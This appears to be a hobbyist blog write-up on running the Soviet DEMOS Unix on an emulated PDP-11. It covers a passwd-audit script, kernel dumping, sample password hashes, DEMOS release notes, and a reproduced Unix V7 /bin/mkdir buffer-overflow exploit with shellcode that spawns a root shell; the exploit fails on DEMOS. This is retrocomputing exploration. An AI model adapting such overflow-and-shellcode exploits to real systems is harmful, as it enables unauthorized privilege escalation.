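"""
import string

# Constructed sample: the /etc/passwd listing from the post, verbatim.
DEMOS_PASSWD = """\
root:vQwdXj/6D.J2M:0:2:Суперпользователь (The God):/:/bin/csh
daemon:***:1:1:Дьявол во плоти:/:
sys:***:2:2::/:
bin:***:3:2::/:
uucp::4:1:Сеть UUCP:/usr/spool/uucppublic:/usr/lib/uucp/uucico
notes:***:5:1:Создатель Notesfiles:/usr/spool/notes:
anon:***:6:1:Анонимный пользователь Notesfiles:/usr/spool/notes:
news:***:7:1:Создатель новостей:/usr/spool/news:
bugs:***:8:1:Адресат для сообщений об ошибках:/usr/spool/mail:/usr/bin/mail
rubin:***:100:2:суперпользователь СУБД РУБИН:/usr/rubin:/bin/csh
user::101:1:Пользователь:/usr/user:/usr/bin/vs
"""

# The 64-character alphabet crypt(3) uses for salt and hash.
CRYPT_ALPHABET = frozenset(string.ascii_letters + string.digits + "./")


def classify_hash(field: str) -> str:
    """Return 'empty', 'descrypt' or 'locked' for one password field."""
    if field == "":
        return "empty"
    if len(field) == 13 and all(ch in CRYPT_ALPHABET for ch in field):
        return "descrypt"
    return "locked"


def audit_passwd(text: str) -> dict[str, list[str]]:
    """Map each finding to the affected usernames (malformed lines kept whole)."""
    findings: dict[str, list[str]] = {
        "empty": [], "descrypt": [], "locked": [], "uid0": [], "malformed": [],
    }
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings["malformed"].append(line)
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        findings[classify_hash(pw)].append(user)
        if uid == "0":
            findings["uid0"].append(user)   # any uid-0 account is a superuser
    return findings


if __name__ == "__main__":
    for finding, users in audit_passwd(DEMOS_PASSWD).items():
        print(f"{finding:9s} {', '.join(users) or '-'}")
```

On this listing the audit flags uucp and user as passwordless, root as the only account with a real (DES) hash, and the rest as locked.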

Now let’s dump the kernel:

SUPER > ./uuencode /demos demos

– copy the ASCII
– paste the ASCII on the host into demos.txt

$ uudecode demos.txt

On DEMOS:

SUPER 27> ls -la /demos
-rwxrwxr-x 1 root     superuse   81188 сен 10 17:59 /demos
SUPER 28> file /demos
/demos: overlaid pure executable not stripped

On Debian:

user@X201:~/UNIX/dvk-demos > file demos
demos: PDP-11 overlaid pure executable not stripped

So now we have a binary kernel for further analysis.

Let’s try some ancient exploits!

UNIX 7th Edition /bin/mkdir – Local Buffer Overflow
http://www.exploit-db.com/exploits/302/

/*
 * Exploit for /bin/mkdir Unix V7 PDP-11.
 * mkdir has a buffer overflow when checking if the directory
 * in /arg/with/slashes/fname exists.
 *
 * This will run /bin/sh with euid 0, but not uid 0.  Since
 * the shell doesn't do anything special about this, we don't
 * really care.  If you care, run  setuid(0); execl("/bin/sh", 0);
 */

/*
 .globl  _main
 _main:
 mov  pc,r1
 sub  $-[sh-_main-2], r1             / pointer to sh
 mov  r1, r2
 sub  $-8, r2
 clrb -1(r2)                         / null terminate
 mov  r1, r2
 clr  -(r1)                          / char *env[] = {0}
 mov  r1, r3
 mov  r2, -(r1)                      / char *argv[] = {sh, 0}
 mov  r1, r4
 mov  r3, -(r1)                      / reverse of sh,argv,env
 mov  r4, -(r1)
 mov  r2, -(r1)
 sys  59.; 11111; 11111; 11111       / call execve
 argv:   11111; 11111
 sh:     </bin/sh>
 */

char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
 0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
 0102, 020, 041, 012, 0103, 020, 0241, 020,
 0104, 020, 0341, 020, 041, 021, 0241, 020,
 073, 0211, 0111, 022, 0111, 022, 0111, 022,
 0111, 022, 0111, 022, 057, 0142, 0151, 0156,
 057, 0163, 0150, 0 };

#define NOPSLIDE 50
#define CNT 136
#define PC 0xfea0

main(argc, argv)
int argc;
char **argv;
{
    char buf[400];
    int i;
    char *argv2[4];

    /* nop slide + egg */
    for(i = 0; i < NOPSLIDE; ) {
        buf[i++] = 0301;
        buf[i++] = 021;
    }
    strcpy(buf + i, egg);

    /* pad out to CNT */
    for(i = strlen(buf); i < CNT; i++)
        buf[i] = 'a';

    /* overwrite retaddr */
    buf[i++] = PC & 0xff;
    buf[i++] = PC >> 8;

    /* extra stuff */
    buf[i++] = '/';
    buf[i++] = 'a';
    buf[i++] = 0;

    argv2[0] = "/bin/mkdir";
    argv2[1] = buf;
    argv2[2] = 0;
    execv(argv2[0], argv2);
    return 0;
}

Before we run this exercise we need to modify /etc/passwd so that the default shell for the user is changed to /bin/csh. DEMOS on dvk-pdp11 has the ancient ed editor, which is quite cryptic to learn today… So how do we edit /etc/passwd? There are a few options; the first is to simply use cat.

So first, on dvk-pdp11 DEMOS do:

SUPER > cat /etc/passwd

– Copy the output
– On the host, paste the output into a file passwd.txt
– Edit it with your favourite editor and change the user’s shell (remove the Cyrillic from the account descriptions ;)

$ cat passwd.txt

– Copy the output and feed it to DEMOS via a heredoc:

SUPER > mv /etc/passwd /etc/passwd.old
SUPER > cat <<EOF> /etc/passwd
root:vQwdXj/6D.J2M:0:2:Superuser (The God):/:/bin/csh
daemon:***:1:1:Deamon:/:
sys:***:2:2::/:
bin:***:3:2::/:
uucp::4:1:Network UUCP:/usr/spool/uucppublic:/usr/lib/uucp/uucico
notes:***:5:1:Notes Notesfiles:/usr/spool/notes:
anon:***:6:1:anonymouns Notesfiles:/usr/spool/notes:
news:***:7:1:News:/usr/spool/news:
bugs:***:8:1:Bugs:/usr/spool/mail:/usr/bin/mail
rubin:***:100:2:RUBIN DB User:/usr/rubin:/bin/csh
user:CRdA8QWcCutMQ:101:1:User:/usr/user:/bin/csh
EOF

– Here we have the following crypt(3)-hashed passwords:
p4ssw0rd for root and password for user

Also let’s modify /etc/group so it reflects our user!

 SUPER > cat /etc/group

– Copy the output
– On the host, paste the output into a file group.txt
– Edit it with your favourite editor and add user to the users group

$ cat group.txt
SUPER > mv /etc/group /etc/group.old
SUPER > cat <<EOF> /etc/group
superuser:***:0:root
daemon::1:daemon,avg,dmitry
sys::2:bin,sys,yst,root
bin::3:bin,sys,avg,alex
uucp:***:4:uucp
users:***:10:sviridov,flerov,guba,polina,lena,tasha,guest,test,user
EOF

I wonder who Polina, Lena and Tasha were …
If they are still around I send my regards !

– Now exit from the SUPER > shell with CTRL+D
– Log in as user

user > pwd
/usr/user
user > cat <<EOF> /usr/user/exploit.c
char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
0102, 020, 041, 012, 0103, 020, 0241, 020,
0104, 020, 0341, 020, 041, 021, 0241, 020,
073, 0211, 0111, 022, 0111, 022, 0111, 022,
0111, 022, 0111, 022, 057, 0142, 0151, 0156,
057, 0163, 0150, 0 };

#define NOPSLIDE 50
#define CNT 136
#define PC 0xfea0

main(argc, argv)
int argc;
char **argv;
{
char buf[400];
int i;
char *argv2[4];

/* nop slide + egg */
for(i = 0; i < NOPSLIDE; ) {
buf[i++] = 0301;
buf[i++] = 021;
}
strcpy(buf + i, egg);

/* pad out to CNT */
for(i = strlen(buf); i < CNT; i++)
buf[i] = 'a';

/* overwrite retaddr */
buf[i++] = PC & 0xff;
buf[i++] = PC >> 8;

/* extra stuff */
buf[i++] = '/';
buf[i++] = 'a';
buf[i++] = 0;

argv2[0] = "/bin/mkdir";
argv2[1] = buf;
argv2[2] = 0;
execv(argv2[0], argv2);
return 0;
}
EOF
user > cc exploit.c -o /usr/user/exploit
user > ./exploit
mkdir: cannot access аааааааааааааааааааааааааааЕжЪBбЕЬЪ2
ЪЪB!
C!DА!!; IIIII/bin/shaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Ч/.
Наруш. защиты памяти
user >
user > mkdir /etc/test
mkdir: cannot access /etc/.

So the exploit does not work on DEMOS…
There is no coredump under standard user privileges.
Let’s try as root to see if we can get a coredump.

user >
CTRL+D
Log in as root
SUPER > cd /usr/user
SUPER > ./exploit
mkdir: cannot access аааааааааааааааааааааааааааЕжЪBбЕЬЪ2
ЪЪB!
C!DА!!; IIIII/bin/shaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Ч/.
Наруш. защиты памяти (память дампирована)

– Hey, we got a coredump!

SUPER > ls -la core
5 -rw-rw-r-- 1 root     sys         4160 сен 11 16:38 core

– Now uuencode the core file so we can check it on Linux:

SUPER > /path/to/uuencode /usr/user/core core

– Copy the ASCII output
– Paste the ASCII output on the host and save it as core.txt

$ uudecode core.txt
$ strings core
core
core
mkdir
Af~f~
aaaaaa
mkdir: arg count
mkdir: cannot access %aa
mkdir: cannot make directory %s
mkdir: cannot link %s
mkdir: cannot link %s
(null)
kdir: cannot access
/bin/shaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
/bin/mkdir
/bin/shaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
HOME=/
PATH=/:/bin:.:/usr/bin:/etc:/usr/ucb
TERM=ccgd
SHELL=/bin/csh
USER=root
MSG=r
TAPE=/dev/fd0

Let’s do some ancient exploit code debugging!

Lastly, the RELEASE notes (originally in Russian) for this particular version of DEMOS:

1. CONFIGURING THE DEMOS OPERATING SYSTEM
====================================
This section describes the procedures that must be carried out both at the initial installation of the system and in the event of “complete destruction” of the root file system or replacement of the hard disk; the root file system and some directories are described.
The process of preparing the system for operation can be divided into the following stages:
– initial installation (or restoration) of the system from the distribution set of floppy disks (FD);
– booting the system and checking its integrity;
– configuring the system files.
In the event of “partial destruction” of file systems it is recommended to try to restore their integrity with the fsck program (see Appendix 2).
1.1. Initial Installation of the System
===========================
For the initial installation of the system it is necessary to:
– switch on the PC with the “СЕТЬ” (POWER) toggle switch;
– insert the diskette numbered 0 (the start diskette) into the upper (zero) drive;
– on receiving the “@” prompt, press the <B> key, and then in reply to the “$” (dollar) prompt enter “MY0” (or “MY” and press the <ВК> (Return) key);
– after some time the prompt “BOOT:…” will appear on the screen; in reply to it press the <ВК> key;
– to the query “installing DEMOS requires erasing the information on the hard disk…” answer “Y” (YES) and press <ВК>; an incorrectly entered character can be cancelled (before <ВК> is pressed) with the <ЗБ> (Backspace) key;
– to the query “Enter the time…” enter 10 digits and press <ВК>; the time is given in the following form:
yymmddhhmm,
where yy – the last two digits of the year (for example, 90);
mm – the month number (01 to 12);
dd – the day of the month;
hh – the hour (00 to 23);
mm – the minutes (00 to 59);
– to the query “Hard disk drive capacity…” enter a digit, the number of the drive type, and press <ВК>; the drive type is given as follows:
1.  5 MB  153 cylinders  /0-152/ – installation of the “РУБИН” (RUBIN) DBMS is not possible
2. 10 MB  306 cylinders /0-305/ – installation of the RUBIN DBMS is not possible
3. 10 MB  306 cylinders /0-305/ – installation of the RUBIN DBMS is possible
4. 20 MB  612 cylinders /0-611/ – installation of the RUBIN DBMS is possible
– next, to the query “Format the hard disk?” enter “Y” if the disk is to be formatted, or “N” if not;
– after the mini-system has been loaded onto the hard disk, a message will be shown that it must be re-invoked from that disk; after some time the “@” prompt will appear;
– in reply to this prompt type “B”, and then in reply to the “$” (dollar) prompt enter “DW0” (or “DW” and press <ВК>);
– after some time the prompt “BOOT:…” will appear on the screen; in reply to it press <ВК>;
– once the system has been invoked, it will ask for diskette N1 of the base set; insert it into any floppy drive, enter the drive number and press <ВК>;
– after reading the diskette the system will ask for the next one; remove diskette 1 from the drive and insert diskette 2, then diskette 3, and so on;
– after all diskettes of the base set have been read, the system will reboot automatically and check the file system on the hard disk (a second reboot may occur at this point);
– after the reboot the system will show the “Имя:” (Name:) prompt; enter the superuser name root to carry out administrative functions in DEMOS.
If this is the first login after the initial installation or a complete restoration of the system, the following must be done:
– set a password for the user root with the passwd command;
– duplicate the distribution set of floppies.
The cpfd command can be used to copy diskettes (see 4.6.2).
Before switching off the PC the user must execute the command:
/etc/reboot -h ( Mandatory !!! )
Write-protect tabs must be applied to the diskettes of the distribution set. This is necessary so that information on the diskettes is not destroyed by a hardware fault or careless use.
While booting from diskette number 0, it must be without the tab.
1.2. Booting and Checking the Integrity of the System
=======================================
To boot the DEMOS operating system:
– switch on the PC power;
– on receiving the “@” prompt, press the <B> key, and then in reply to the “$” (dollar) prompt enter “DW0” (or “DW” and press <ВК>);
– after some time the prompt “BOOT:…” will appear on the screen; in reply to it press <ВК>;
– to the query “Enter the time …” enter 10 digits and press <ВК>;
– next, to the query “Check the file systems?” press <ВК> (if the file systems are to be checked) or enter “N” and press <ВК> (if they are not to be checked);
– after the file system check the “Имя:” (Name:) prompt will appear; enter the name under which the user is registered in the system; once it has been processed, the login takes place.
N o t e. A second reboot may occur during the file system check.
If “user” is entered in reply to the “Имя:” prompt, the ПРАКТИКА (PRAKTIKA) system is entered (for a description of the PRAKTIKA system see section 3 of the “Reference Manual”).
After finishing work in the system, type “/etc/reboot -h” at the command prompt; once the system answers “SYNCING DISKS … DONE”, the PC power can be switched off.
2. РАСШИРЕННЫЕ ВОЗМОЖНОСТИ ОС ДЕМОС ВЕРСИИ 3.0
===========================================
1.
Генерация ядра demos содержит следущие изменения в
сторону повышенной оптимальности и эффективности работы ядра:
a). Создан новый, максимально быстрый и очень расторопный
в работе драйвер жесткого диска типа “Винчестер”, ре-
жимы  работы которого настраиваются программой rwset.
b). Откорректирован и оптимизирован драйвер гибкого
диска.
c). Создан новый суперуниверсальный драйвер принтера,
поддерживающий работу печатающих устройств типа:
EPSON FX-800, EPSON LX-800, СМ 6302, DZM-180, СМ 6315,
СМ 6900, ROBOTRON СМ 6329, D100, D100M, и т.д.
в полном объеме их функциональных возможностей
и с учетом ошибок в ПЗУ EPSON FX-800. Режимы работы
драйвера настраивается программой lpset.
Подробнее см. файл READ_LP в корневом каталоге.
d). Данная версия ядра поддерживает работу контроллера КЦГД
как с ПЗУ КР18101РЕ2-181 на плате КЦГД, так и с ПЗУ
КР18101РЕ2-182, работающей в 8-битном символьном режиме.
(Следует заметить, что ядро версии 2.0 не способно рабо-
тать с КЦГД на ПЗУ КР18101РЕ2-182). Однако, поставляемый
графический протокол /etc/graf,загружаемый в ОЗУ КЦГД
и разработанный для ПЗУ КР18101РЕ2-181, не будет за-
гружаться при ПЗУ КР18101РЕ2-182. В настоящее время
разрабатывается новый графический протокол для
последней ПЗУ.
В целях экономии памяти изменены параметры
конфигурации ядра:
e). Количество буферов ввода/вывода.
f). Количество процессов в системе.
g). Количество одновременно исполняемых программ.
h). Количество описателей файлов.
i). Количество одновременно открытых файлов.
j). “Зажата” статистика по буферам ввода/вывода, по под-
качке, по загрузке системы, по командам.
k). Уменьшено количество оверлеев ядра demos.
l). И другие мелочи…
2.
Устранены ошибки в загрузчике boot, что позволило
работать на разных типах жестких дисков.
3.
Устранены ошибки в промежуточных загрузчиках
rwuboot, fduboot.
4.
Новая версия 4.1 полиэкранного редактора red
содержит следующие изменения и дополнения:
a). <ПФ1><i><ВК> установка/сброс режима вставки.
b). <ПФ1><b><ВК> установка режима 132 символа на экране.
c). <ПФ1><l><ВК> установка режима 80 символов на экране.
d). <ПФ1><g><ВК> установка режима прорисовки символов
псевдографики. С помощью клавиш <Ф4>,<Ф5>,<Ф6>,<Ф8>
можно “рисовать” и “стирать” вертикальные и горизон-
тальные сплошные линии.
e). <ПФ1><Ф0> установка/сброс режима рисования/стирания псевдографики.
f). <ПФ1><n><ВК> выход из режима псевдографики.
g). <Ф1>   перемещение курсора по словам вперед.
h). <ПФ4> перемещение курсора по концам строк.
i). <Ф5>   удаление слова справа от курсора.
j). <ПФ1><Ф2><стрелка вправо> перемещение курсора
в правую крайнюю позицию текущего окна.
k). <ПФ1><Ф2><стрелка влево> перемещение курсора
в левую крайнюю позицию текущего окна.
l). <ПФ1><Ф2><стрелка вверх> перемещение курсора
в верхнюю крайнюю позицию текущего окна.
m). <ПФ1><Ф2><стрелка вниз> перемещение курсора
в нижнюю крайнюю позицию текущего окна.
n). <ПФ1><восьмеричное число><Ф2><Ф0> ввод спец. символов,
где число состоит из трех цифр.
о). Оптимизирован вывод информации на экран при
использовании клавиш <Ф7>, <ПФ1><Ф7>, <Ф2><Ф7>, <ПФ1><Ф2><Ф7>
p). Отменено действие клавиши <Ф.>, как табуляции назад
5.
The graf program (file etc/graf) has been corrected. The graphics protocol can now be loaded both in the compatibility mode (VT52) and in the extended mode (VT100) of the display. An escape sequence setting the scrolling region to screen lines 2 through 22 has been added to the etc/termcap file, which makes the red editor's operation clearer; there are also other minor changes.
6.
A convenient initial installation of the DEMOS OS onto a hard disk has been made (see item 1 above), taking into account the different disk types and the "РУБИН" DBMS.
7.
Small changes have been made to the startup file etc/rc (related to the fsck and mount programs).
8.
The graphics library libgraph.a is located in the usr/lib directory and is a functional analogue of the graphics library from "Borland International". The READ_GRAF file contains a description of the graphics functions.
*  *  *  *  *
9.
The opint program determines the optimal interleaving by sectors, surfaces and cylinders and formats the hard disk. Control testing after formatting a hard disk with optimal interleaving showed that the efficiency of working with the disk increased on average by 25-30%. The opint program must be started from a floppy (the OS is in that case also booted from the floppy numbered 0). The opint program has the following options:
Usage: opint {-i[N] | -f [-q] [-bN] [-lN] [-sN] [-cN]} [-r]
-i[N]  compute the optimal interleaving factor by sectors/surfaces/ and by cylinders. N is the number of the working cylinder; cylinder N-1 is also used (default N==152)
-f  format the hard disk
-r  do not preserve the information on the hard disk (on an unformatted disk this option is mandatory !!!)
-q  no questions
-bN  start formatting from cylinder N inclusive (default from cylinder N==0); this cylinder (and also the previous one) is used as the working cylinder for finding the optimal interleaving; if the option -b0 is used or the option is absent altogether, cylinder 152 becomes the working one.
-lN  end formatting at cylinder N inclusive (default up to cylinder N==152)
-sN  set the interleaving factor N by sectors/surfaces/ (default N==optimal)
-cN  set the interleaving factor N by cylinders (default N==optimal)
10.
The rwset program is used to configure the operating modes of the hard disk driver and has the options:
Usage: rwset [-cN] [[-]w]
-cN – enable precompensation from cylinder N
w – enable write verification
-w – disable write verification
11.
The lpset program is used to configure the operating modes of the printer driver. All information on printing is contained in the READ_LP file.
* * * * * * *
3. THE DEMOS/306 OPERATING SYSTEM
==============================
The DEMOS/306 operating system is intended to be installed and to operate on a single hard disk ("Winchester", 20MB) alongside the RT-11 operating system. The 20MB hard disk is divided between the two OSes as follows:
RT-11 : cylinders   0 to 305 (10MB)
DEMOS : cylinders 306 to 611 (10MB)
Initially (on power-up) the RT-11 OS boots, and its hard disk driver must be configured to work with 10 MB of disk space (up to and including cylinder 305). After RT-11 has booted, the DEMOS/306 OS is invoked with the DEMOS command. The initial installation of DEMOS/306 differs from the installation of DEMOS only in the installation floppy N0; the remaining five distribution floppies N1-N5 are identical for both OSes.
A user tired of the two-wheeled RT-11 scooter moves, by pressing five keys, into the DEMOS/306 strategic bomber !
THE DEMOS/306 OS – A BREAKTHROUGH INTO THE FUTURE !
THE DEMOS/306 OS – SIMPLY FANTASTIC !
POSTCRYPTUM 1.
————– The /TEST directory contains control and demonstration tasks and tests, which are run with the command /TEST/main.
POSTCRYPTUM 2.
————– In the supplied distribution the directories bin/, usr/bin/ and etc/ contain utilities and files (in particular:
c7t10    nroff      autoconfig  termcap
chgrp    pp         clri        timstat
chown    pstat      cron        ttys
dump     restor     dostat      utpm
dumpdir  rline      getty       wall
edit     rmail      graf
egrep    setcolor   group
false    smbl       group.std
fgrep    startcode  init
gets     starttext  iostat
login    su         lp_daemon
lpf      tfd0       mknod
lpset    wermit     psdatabase
lx       accton     savecore
mix      admclean   shutdown
and others...) for which there are no descriptions in the documentation, because descriptions of the utilities and files needed by the system administrator or system programmer, and not directly related to the user's work, are outside the scope of this documentation, whose aim is to give the most essential information for the user. Descriptions can be found in various literature on the UNIX OS, since most of the utilities and service files have the names generally accepted in the UNIX OS family.
On the other hand, not all of the utilities (in particular:
ardos     from      mkmf      splineg
banner    hier      mm        strings
blank     hostname  prmail    sum
checkobj  ident     rab       unifdef
ckdir     indent    rcs       units
colcrt    install   rcsdiff   uptime
ctags     last      rcsintro  uucpc
cxref     lastcomm  rcsmerge  uuxc
ddutok    lex       rev       whoami
error     lint      rlog      badsect
expand    look      script    ncheck
fold      merge     spell
and others...) described in the documentation are contained in the distribution, because the documentation was compiled with further development in mind.
POSTCRYPTUM 3.
————– Not included in the distribution and supplied separately:
a). The "РУБИН" DBMS / with a set of documentation /
b). The integrated shell "Demos Commander" – an analogue of "Norton Commander".
POSTCRYPTUM 4.
————– Version 3.0 of the DEMOS OS was worked on by:
Юдин К.Е.
Судаков А.В.
Рыжонков К.С.
Брагин Д.Н.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright 1991 by Research Institute “Scientific Centre”,
lab 462/2. All rights reserved.
PHONE:   536-56-42.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
MOSCOW, ZELENOGRAD, Research Institute "SCIENTIFIC CENTRE" (lab. 462/2),
TELEPHONE: 536-56-42.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

More to come :D

 

